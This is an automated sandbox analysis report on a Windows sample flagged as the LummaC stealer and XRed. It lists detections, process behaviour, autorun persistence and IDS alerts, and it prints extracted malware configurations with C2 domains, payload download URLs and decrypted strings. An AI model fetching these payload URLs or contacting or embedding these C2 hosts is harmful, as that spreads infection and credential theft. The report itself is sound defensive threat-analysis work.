Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1585287
MD5:d0598443fa9984227105811e5d89b70f
SHA1:3932d4696f4130658fbf2a16e7f771fc756a63cc
SHA256:fc1595c71b570027b6712c70cafcc075686e14b5702a5a0910f642eb739ac01f
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • 1.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\1.exe" MD5: D0598443FA9984227105811E5D89B70F)
    • ._cache_1.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\._cache_1.exe" MD5: 8F02CCF024090E3BD52574174749C778)
    • Synaptics.exe (PID: 2260 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 065BECDE24188ED65E53BECB09A5A039)
      • WerFault.exe (PID: 5508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 4540 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "twistforcepo.cfd", "rabidcowse.shop"], "Build id": "sadvnqw3nerasdf--"}

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1.exeJoeSecurity_XRedYara detected XRedJoe Security
    1.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
        C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\ProgramData\Synaptics\RCX9CB3.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\ProgramData\Synaptics\RCX9CB3.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      Process Memory Space: 1.exe PID: 2584JoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Synaptics.exe PID: 2260JoeSecurity_XRedYara detected XRedJoe Security
                          Click to see the 1 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          1.0.1.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            1.0.1.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.exe, ProcessId: 2584, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 2260, TargetFilename: C:\Users\user\AppData\Local\Temp\U1NTS3we.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-07T13:18:28.735724+010020448871A Network Trojan was detected192.168.2.1149744142.250.185.110443TCP
                              2025-01-07T13:18:28.773157+010020448871A Network Trojan was detected192.168.2.1149745142.250.185.110443TCP
                              2025-01-07T13:18:29.796536+010020448871A Network Trojan was detected192.168.2.1149754142.250.185.110443TCP
                              2025-01-07T13:18:29.799804+010020448871A Network Trojan was detected192.168.2.1149757142.250.185.110443TCP
                              2025-01-07T13:18:30.904201+010020448871A Network Trojan was detected192.168.2.1149768142.250.185.110443TCP
                              2025-01-07T13:18:30.922727+010020448871A Network Trojan was detected192.168.2.1149769142.250.185.110443TCP
                              2025-01-07T13:18:31.948079+010020448871A Network Trojan was detected192.168.2.1149780142.250.185.110443TCP
                              2025-01-07T13:18:31.951596+010020448871A Network Trojan was detected192.168.2.1149781142.250.185.110443TCP
                              2025-01-07T13:18:33.998523+010020448871A Network Trojan was detected192.168.2.1149806142.250.185.110443TCP
                              2025-01-07T13:18:34.040266+010020448871A Network Trojan was detected192.168.2.1149807142.250.185.110443TCP
                              2025-01-07T13:18:35.057851+010020448871A Network Trojan was detected192.168.2.1149818142.250.185.110443TCP
                              2025-01-07T13:18:35.116762+010020448871A Network Trojan was detected192.168.2.1149820142.250.185.110443TCP
                              2025-01-07T13:18:36.130544+010020448871A Network Trojan was detected192.168.2.1149828142.250.185.110443TCP
                              2025-01-07T13:18:36.170403+010020448871A Network Trojan was detected192.168.2.1149829142.250.185.110443TCP
                              2025-01-07T13:18:37.195532+010020448871A Network Trojan was detected192.168.2.1149840142.250.185.110443TCP
                              2025-01-07T13:18:37.222448+010020448871A Network Trojan was detected192.168.2.1149841142.250.185.110443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-07T13:18:29.318163+010028326171Malware Command and Control Activity Detected192.168.2.114975369.42.215.25280TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 1.exeAvira: detected
                              Source: 1.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SUpdate.iniH)Avira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCX9CB3.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX9CB3.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: 1.exeMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "twistforcepo.cfd", "rabidcowse.shop"], "Build id": "sadvnqw3nerasdf--"}
                              Source: 1.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 86%
                              Multi AV Scanner detection for submitted file
                              Source: 1.exeVirustotal: Detection: 84%Perma Link
                              Source: 1.exeReversingLabs: Detection: 86%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX9CB3.tmpJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_1.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 1.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 1.exeString decryptor: cloudewahsj.shop
                              Source: 1.exeString decryptor: rabidcowse.shop
                              Source: 1.exeString decryptor: noisycuttej.shop
                              Source: 1.exeString decryptor: tirepublicerj.shop
                              Source: 1.exeString decryptor: framekgirus.shop
                              Source: 1.exeString decryptor: wholersorie.shop
                              Source: 1.exeString decryptor: abruptyopsn.shop
                              Source: 1.exeString decryptor: nearycrepso.shop
                              Source: 1.exeString decryptor: twistforcepo.cfd
                              Source: 1.exeString decryptor: lid=%s&j=%s&ver=4.0
                              Source: 1.exeString decryptor: TeslaBrowser/5.5
                              Source: 1.exeString decryptor: - Screen Resoluton:
                              Source: 1.exeString decryptor: - Physical Installed Memory:
                              Source: 1.exeString decryptor: Workgroup: -
                              Source: 1.exeString decryptor: sadvnqw3nerasdf--
                              Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49781 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49819 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49818 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49821 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49820 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49858 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49857 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.11:49865 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49876 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49877 version: TLS 1.2
                              Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: 1.exeBinary or memory string: [autorun]
                              Source: 1.exeBinary or memory string: [autorun]
                              Source: 1.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exe.1.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.1.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.1.drBinary or memory string: autorun.inf
                              Source: RCX9CB3.tmp.1.drBinary or memory string: [autorun]
                              Source: RCX9CB3.tmp.1.drBinary or memory string: [autorun]
                              Source: RCX9CB3.tmp.1.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00521816
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]2_2_004F7054
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]2_2_004FB021
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004FB021
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov eax, esi2_2_0051D0D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]2_2_0051D0D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_005238E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]2_2_004EC080
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]2_2_00502880
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebx, bx2_2_00507885
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_004FF170
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax2_2_005221E9
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h2_2_005221E9
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebx, byte ptr [esi]2_2_004F618C
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_004FBA52
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov esi, ecx2_2_004FBA52
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_004FBA52
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh2_2_004E2210
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0051A230
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00511AF5
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_005242E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_00520A90
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]2_2_004EB280
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00521B50
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00502370
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0050FB7D
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_004E9360
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]2_2_004E8320
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_004F9B30
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_004FF3E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [esi], al2_2_004FB3F2
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, eax2_2_004FAB90
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov word ptr [edx], cx2_2_004F8BA2
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then jmp ecx2_2_00508C62
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, eax2_2_00507C10
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh2_2_00524C20
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]2_2_004F4C30
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, eax2_2_004F8492
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edx, word ptr [ebx]2_2_0051CD40
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0050C5E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [esi], al2_2_004FB58F
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004F95B6
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004F95B6
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov edi, edx2_2_0051E6E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx eax, word ptr [edx]2_2_0051E6E0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, edx2_2_00510F54
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, edx2_2_00510F4E
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_004FA770
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0050F716
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, edx2_2_00510F03
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_004E7730
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_004E7730
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_005237D0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]2_2_00507FC0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]2_2_00507FC0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]2_2_0050A7F0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov edx, ecx2_2_0050A7F0
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov ecx, eax2_2_00507FFD
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov edx, ecx2_2_0050AF92
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0050AF92
                              Source: C:\Users\user\Desktop\._cache_1.exeCode function: 4x nop then mov edx, ecx2_2_0050AFB0
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 68MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.11:49753 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49745 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49744 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49757 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49754 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49780 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49807 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49806 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49818 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49840 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49820 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49841 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49781 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49768 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49828 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49829 -> 142.250.185.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49769 -> 142.250.185.110:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: noisycuttej.shop
                              Source: Malware configuration extractorURLs: tirepublicerj.shop
                              Source: Malware configuration extractorURLs: framekgirus.shop
                              Source: Malware configuration extractorURLs: nearycrepso.shop
                              Source: Malware configuration extractorURLs: cloudewahsj.shop
                              Source: Malware configuration extractorURLs: wholersorie.shop
                              Source: Malware configuration extractorURLs: abruptyopsn.shop
                              Source: Malware configuration extractorURLs: twistforcepo.cfd
                              Source: Malware configuration extractorURLs: rabidcowse.shop
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
